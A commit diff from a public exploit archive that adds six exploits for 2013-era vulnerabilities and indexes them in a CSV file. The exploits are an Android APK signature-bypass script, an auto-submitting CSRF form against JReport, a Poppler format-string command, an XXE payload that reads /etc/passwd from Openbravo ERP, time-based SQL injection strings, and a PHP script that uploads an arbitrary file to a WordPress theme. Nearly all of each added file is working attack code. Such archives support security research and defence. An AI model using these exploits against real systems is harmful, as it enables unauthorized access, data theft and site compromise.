DB: 2015-11-28

6 new exploits
twi252 · Nov 28, 2015 · f25ba13 · f25ba13
1 parent 672c4d0
commit f25ba13
Show file tree

Hide file tree

Showing 7 changed files with 144 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -35086,3 +35086,9 @@ id,file,description,date,author,platform,type,port
 38813,platforms/multiple/remote/38813.txt,"Apache Shindig XML External Entity Information Disclosure Vulnerability",2013-10-21,"Kousuke Ebihara",multiple,remote,0
 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Vulnerability",2013-10-20,SultanHaikal,php,webapps,0
 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux x86_64 Polymorphic execve Shellcode - 31 bytes",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
+38816,platforms/jsp/webapps/38816.html,"JReport 'dealSchedules.jsp' Cross-Site Request Forgery Vulnerability",2013-10-25,"Poonam Singh",jsp,webapps,0
+38817,platforms/linux/local/38817.txt,"Poppler <= 0.14.3 '/utils/pdfseparate.cc' Local Format String Vulnerability",2013-10-26,"Daniel Kahn Gillmor",linux,local,0
+38818,platforms/multiple/remote/38818.xml,"Openbravo ERP CVE-2013-3617 XML External Entity Information Disclosure Vulnerability",2013-10-30,"Tod Beardsley",multiple,remote,0
+38819,platforms/php/webapps/38819.txt,"Course Registration Management System Cross Site Scripting and SQL Injection Vulnerabilities",2013-10-21,"Omar Kurt",php,webapps,0
+38820,platforms/php/webapps/38820.php,"WordPress This Way Theme 'upload_settings_image.php' Arbitrary File Upload Vulnerability",2013-11-01,Bet0,php,webapps,0
+38821,platforms/android/remote/38821.py,"Google Android Signature Verification Security Bypass Vulnerability",2013-11-04,"Jay Freeman",android,remote,0
diff --git a/platforms/android/remote/38821.py b/platforms/android/remote/38821.py
@@ -0,0 +1,44 @@
+source: http://www.securityfocus.com/bid/63547/info
+
+Google Android is prone to a security-bypass vulnerability.
+
+Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks.
+
+Android 4.4 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python
+
+import zipfile
+import struct
+import sys
+
+# usage: ./pocB.py new.apk old.apk file data
+zout = zipfile.ZipFile(sys.argv[1], "w")
+zin = zipfile.ZipFile(sys.argv[2], "r")
+replace = sys.argv[3]
+new = open(sys.argv[4], 'r').read()
+
+fp = zout.fp
+
+for name in zin.namelist():
+    old = zin.read(name)
+    if name != replace:
+        zout.writestr(name, old, zipfile.ZIP_DEFLATED)
+    else:
+        assert len(new) <= len(old)
+
+        # write header, old data, and record offset
+        zout.writestr(name, old, zipfile.ZIP_STORED)
+        offset = fp.tell()
+
+        # return to name length, set to skip old data
+        fp.seek(-len(old) -len(name) -4, 1)
+        fp.write(struct.pack('<h', len(name) + len(old)))
+
+        # after old data, write new data \0 padded
+        fp.seek(offset)
+        fp.write(new)
+        fp.write('\0' * (len(old) - len(new)))
+
+zout.close()
+zin.close()
diff --git a/platforms/jsp/webapps/38816.html b/platforms/jsp/webapps/38816.html
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/63363/info
+
+JReport is prone to a cross-site request-forgery vulnerability.
+
+Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. 
+
+<html>
+<body>
+<form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post">
+<input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29">
+<input type=hidden name="cmd" value="cmd_delete_schedules">
+<input type=hidden name="taskClass" value="APIDemoDynamicExportTask">
+<input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin">
+<input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin">
+</form>
+<script>
+document.foo.submit();
+</script>
+</body>
+</html>
diff --git a/platforms/linux/local/38817.txt b/platforms/linux/local/38817.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/63374/info
+
+Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
+
+Versions prior to Poppler 0.24.3 are vulnerable. 
+
+./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n" 
diff --git a/platforms/multiple/remote/38818.xml b/platforms/multiple/remote/38818.xml
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/63431/info
+
+Openbravo ERP is prone to an information-disclosure vulnerability.
+
+An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
+
+Openbravo ERP 2.5 and 3.0 are vulnerable. 
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [
+ <!ELEMENT comments ANY >
+ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>
+
+<ob:Openbravo xmlns:ob="http://www.example.com"
+xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
+        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
+                <id>C970393BDF6C43E2B030D23482D88EED</id>
+                <comments>&xxe;</comments>
+        </Product>
+</ob:Openbravo>
+
+
diff --git a/platforms/php/webapps/38819.txt b/platforms/php/webapps/38819.txt
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/63435/info
+
+Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
+
+Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected. 
+
+
+http://example.com/add_user.php (POST -  params: work_tel, lastname, email, gmc_reg, job_title, firstname)
+
+http://example.com/login.php (POST -  params: username)
+
+http://example.com/auth.php (POST -  params: username)
+
+http://example.com/forgotten_password.php
+(POST - username)
+username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
+
+http://example.com/add_user.php
+(POST - email)
+email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
+
+http://example.com/login.php
+(POST - username)
+username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+
diff --git a/platforms/php/webapps/38820.php b/platforms/php/webapps/38820.php
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/63523/info
+
+The This Way Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. 
+
+<?php
+$uploadfile="upl.php";
+$ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
+curl_setopt($ch, CURLOPT_POST, true); 
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+        array('Filedata'=>"@$uploadfile"));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+?>